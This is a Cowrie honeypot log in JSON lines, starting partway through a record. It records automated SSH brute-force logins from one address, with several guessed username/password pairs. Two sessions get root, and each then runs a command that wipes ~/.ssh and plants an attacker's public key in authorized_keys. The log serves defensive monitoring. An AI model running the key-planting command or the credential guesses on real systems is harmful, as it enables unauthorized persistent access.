istp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:04:17.490963Z","src_ip":"212.227.235.229","session":"8f9232d0db31"}
{"eventid":"cowrie.login.failed","username":"build","password":"build.123","message":"login attempt [build/build.123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:04:18.032451Z","src_ip":"212.227.235.229","session":"8f9232d0db31"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:19.174078Z","src_ip":"212.227.235.229","session":"8f9232d0db31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43286,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b68c87240a3","protocol":"ssh","message":"New connection: 212.227.235.229:43286 (1.2.3.4:22) [session: 9b68c87240a3]","sensor":"my-vps","timestamp":"2025-09-08T23:04:24.170197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:04:24.171254Z","src_ip":"212.227.235.229","session":"9b68c87240a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:04:24.482650Z","src_ip":"212.227.235.229","session":"9b68c87240a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38316,"dst_ip":"1.2.3.4","dst_port":22,"session":"867cb1133be5","protocol":"ssh","message":"New connection: 212.227.235.229:38316 (1.2.3.4:22) [session: 867cb1133be5]","sensor":"my-vps","timestamp":"2025-09-08T23:04:25.029697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:04:25.030552Z","src_ip":"212.227.235.229","session":"867cb1133be5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:04:25.129750Z","src_ip":"212.227.235.229","session":"867cb1133be5"}
{"eventid":"cowrie.login.failed","username":"hammer","password":"1234567","message":"login attempt [hammer/1234567] failed","sensor":"my-vps","timestamp":"2025-09-08T23:04:25.571772Z","src_ip":"212.227.235.229","session":"867cb1133be5"}
{"eventid":"cowrie.login.failed","username":"debian","password":"password123","message":"login attempt [debian/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:04:25.768968Z","src_ip":"212.227.235.229","session":"9b68c87240a3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:26.675375Z","src_ip":"212.227.235.229","session":"867cb1133be5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37932,"dst_ip":"1.2.3.4","dst_port":22,"session":"35ae398a1746","protocol":"ssh","message":"New connection: 212.227.235.229:37932 (1.2.3.4:22) [session: 35ae398a1746]","sensor":"my-vps","timestamp":"2025-09-08T23:04:26.692579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:04:26.693398Z","src_ip":"212.227.235.229","session":"35ae398a1746"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:04:26.793864Z","src_ip":"212.227.235.229","session":"35ae398a1746"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:27.082492Z","src_ip":"212.227.235.229","session":"9b68c87240a3"}
{"eventid":"cowrie.login.failed","username":"localhost","password":"12345","message":"login attempt [localhost/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T23:04:27.242804Z","src_ip":"212.227.235.229","session":"35ae398a1746"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52856,"dst_ip":"1.2.3.4","dst_port":22,"session":"67cb32808070","protocol":"ssh","message":"New connection: 212.227.235.229:52856 (1.2.3.4:22) [session: 67cb32808070]","sensor":"my-vps","timestamp":"2025-09-08T23:04:27.781090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:04:27.781812Z","src_ip":"212.227.235.229","session":"67cb32808070"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:04:28.016815Z","src_ip":"212.227.235.229","session":"67cb32808070"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:28.347364Z","src_ip":"212.227.235.229","session":"35ae398a1746"}
{"eventid":"cowrie.login.failed","username":"init","password":"Welcome1","message":"login attempt [init/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T23:04:28.998765Z","src_ip":"212.227.235.229","session":"67cb32808070"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:30.236459Z","src_ip":"212.227.235.229","session":"67cb32808070"}
{"eventid":"cowrie.session.connect","src_ip":"167.94.138.184","src_port":55354,"dst_ip":"1.2.3.4","dst_port":23,"session":"2fb2b574c542","protocol":"telnet","message":"New connection: 167.94.138.184:55354 (1.2.3.4:23) [session: 2fb2b574c542]","sensor":"my-vps","timestamp":"2025-09-08T23:04:30.867863Z"}
{"eventid":"cowrie.session.closed","duration":15.375826835632324,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:46.243614Z","src_ip":"167.94.138.184","session":"2fb2b574c542"}
{"eventid":"cowrie.session.connect","src_ip":"167.94.138.184","src_port":54274,"dst_ip":"1.2.3.4","dst_port":23,"session":"cc2f109a3d43","protocol":"telnet","message":"New connection: 167.94.138.184:54274 (1.2.3.4:23) [session: cc2f109a3d43]","sensor":"my-vps","timestamp":"2025-09-08T23:04:50.707729Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36942,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e9b83d73357","protocol":"ssh","message":"New connection: 212.227.235.229:36942 (1.2.3.4:22) [session: 3e9b83d73357]","sensor":"my-vps","timestamp":"2025-09-08T23:04:55.085109Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:04:55.085941Z","src_ip":"212.227.235.229","session":"3e9b83d73357"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:04:55.401795Z","src_ip":"212.227.235.229","session":"3e9b83d73357"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35834,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7f64a856581","protocol":"ssh","message":"New connection: 212.227.235.229:35834 (1.2.3.4:22) [session: c7f64a856581]","sensor":"my-vps","timestamp":"2025-09-08T23:04:55.511057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:04:55.544840Z","src_ip":"212.227.235.229","session":"c7f64a856581"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:04:55.771466Z","src_ip":"212.227.235.229","session":"c7f64a856581"}
{"eventid":"cowrie.login.success","username":"root","password":"Yq123456","message":"login attempt [root/Yq123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:04:56.796857Z","src_ip":"212.227.235.229","session":"c7f64a856581"}
{"eventid":"cowrie.login.success","username":"root","password":"fr33d0m","message":"login attempt [root/fr33d0m] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:04:56.833081Z","src_ip":"212.227.235.229","session":"3e9b83d73357"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:04:57.348509Z","src_ip":"212.227.235.229","session":"c7f64a856581"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:04:57.349179Z","src_ip":"212.227.235.229","session":"c7f64a856581"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:04:57.350150Z","src_ip":"212.227.235.229","session":"c7f64a856581"}
{"eventid":"cowrie.session.connect","src_ip":"167.94.138.184","src_port":40382,"dst_ip":"1.2.3.4","dst_port":23,"session":"b1bae20069e7","protocol":"telnet","message":"New connection: 167.94.138.184:40382 (1.2.3.4:23) [session: b1bae20069e7]","sensor":"my-vps","timestamp":"2025-09-08T23:04:57.351819Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:04:57.492327Z","src_ip":"212.227.235.229","session":"3e9b83d73357"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:04:57.493056Z","src_ip":"212.227.235.229","session":"3e9b83d73357"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:04:57.493855Z","src_ip":"212.227.235.229","session":"3e9b83d73357"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:57.533058Z","src_ip":"212.227.235.229","session":"c7f64a856581"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:57.813333Z","src_ip":"212.227.235.229","session":"3e9b83d73357"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:04:58.092269Z","src_ip":"212.227.235.229","session":"c7f64a856581"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:04:58.092954Z","src_ip":"212.227.235.229","session":"c7f64a856581"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:04:58.276747Z","src_ip":"212.227.235.229","session":"c7f64a856581"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:58.277664Z","src_ip":"212.227.235.229","session":"c7f64a856581"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37132,"dst_ip":"1.2.3.4","dst_port":22,"session":"d402716b3223","protocol":"ssh","message":"New connection: 212.227.235.229:37132 (1.2.3.4:22) [session: d402716b3223]","sensor":"my-vps","timestamp":"2025-09-08T23:04:58.511365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:04:58.534591Z","src_ip":"212.227.235.229","session":"d402716b3223"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:04:58.779469Z","src_ip":"212.227.235.229","session":"3e9b83d73357"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:04:58.780303Z","src_ip":"212.227.235.229","session":"3e9b83d73357"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:04:58.785366Z","src_ip":"212.227.235.229","session":"d402716b3223"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:04:59.099219Z","src_ip":"212.227.235.229","session":"3e9b83d73357"}
